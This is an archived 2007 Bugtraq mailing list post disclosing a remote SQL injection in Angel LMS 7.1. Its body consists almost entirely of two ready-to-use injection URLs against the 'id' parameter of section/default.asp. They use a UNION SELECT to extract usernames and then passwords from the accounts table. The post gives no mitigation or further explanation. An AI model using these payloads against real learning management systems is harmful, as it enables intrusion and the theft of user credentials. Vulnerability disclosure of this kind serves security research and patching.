Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Angel LMS 7.1 - Remote SQL Injection

From: Guns () inbox com
Date: 1 Mar 2007 16:06:06 -0000
# Angel LMS 7.1 Remote SQL Injection
# by Guns

#All User Accounts#
http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20accounts--"

#Account Passwords#
http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20password%20from%20accounts--"
Previous By Date Next
Previous By Thread Next

Current thread: